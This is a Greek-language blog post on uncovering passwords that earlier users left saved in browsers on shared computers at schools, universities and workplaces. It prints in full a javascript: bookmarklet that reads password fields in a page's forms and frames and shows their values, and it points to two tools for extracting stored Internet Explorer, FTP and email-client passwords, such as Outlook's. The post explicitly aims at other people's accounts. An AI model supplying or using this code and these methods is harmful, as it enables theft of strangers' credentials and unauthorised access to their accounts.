Αν βρισκόμαστε σε κάποιον δημόσιο
υπολογιστή (σχολείο,πανεπιστήμιο,δουλειά κτλ.) είναι πολύ πιθανό να
βρούμε κάποιες ιστοσελίδες στις οποίες κάποιος χρήστης νωρίτερα να έχει
κάνει login και ο browser να έχει κρατήσει τα στοιχεία του λογαριασμού
του.Όμως ακόμα και αν γνωρίζουμε το όνομα του account πως θα δούμε τι
κρύβεται πίσω από τα **** του κωδικού του?
Μέθοδος 1
Το μόνο που θα πρέπει να κάνουμε είναι να
αντιγράψουμε τον παρακάτω κώδικα στην μπάρα διευθύνσεων του browser μας
και ενώ βρισκόμαστε στην ιστοσελίδα με την login φόρμα και με το
password σε μορφή ****
Κώδικας:
javascript:
var p=r(); function r(){var g=0;var x=false;var
x=z(document.forms);g=g+1;var w=window.frames;for(var
k=0;k<w.length;k++) {var x = ((x) ||
(z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ +
g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++)
{var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j]))
{b=true}}}return b;}function h(ej){var s=”;if
(ej.type==’password’){s=ej.value;if (s!=”){prompt(‘Password found ‘,
s)}else{alert(‘Password is blank’)}return true;}}
Το script σε .txt —-> http://uploading.com/files/8b1f3cab/script.txt/
Εικόνα:
Αποκάλυψη κωδικών πίσω από τα ****
Ένας άλλος τρόπος είναι να κατεβάσουμε το
πρόγραμμα Asterisk Key και να το τρέξουμε.Όταν θα βρισκόμαστε στην
ιστοσελίδα με το login και ενώ υπάρχει ήδη το password στην φόρμα με την
μορφή **** πατάμε στο μενού Show Internet Explorer Passwords
Download: Asterisk KeyΜέθοδος 3
Χρησιμοποιώντας την εφαρμογή
SC-PassUnleash.Η εφαρμογή αυτήν δουλεύει μόνο σε συγκεκριμένους FTP και
Email Clients αλλά μπορεί να μας φανεί χρήσιμη σε περίπτωση που θέλουμε
να βρούμε το email password κάποιου που είναι αποθηκευμένο σε κάποιο
client π.χ Outlook.
Εικόνα 2:
Download: SC-PassUnleash
Υποσημείωση:
Το Javascript έχει ανεβεί σε μορφή .txt για να μην υπάρχει πρόβλημα με τον τρόπο που διαχειρίζεται τα “” η wordpress.
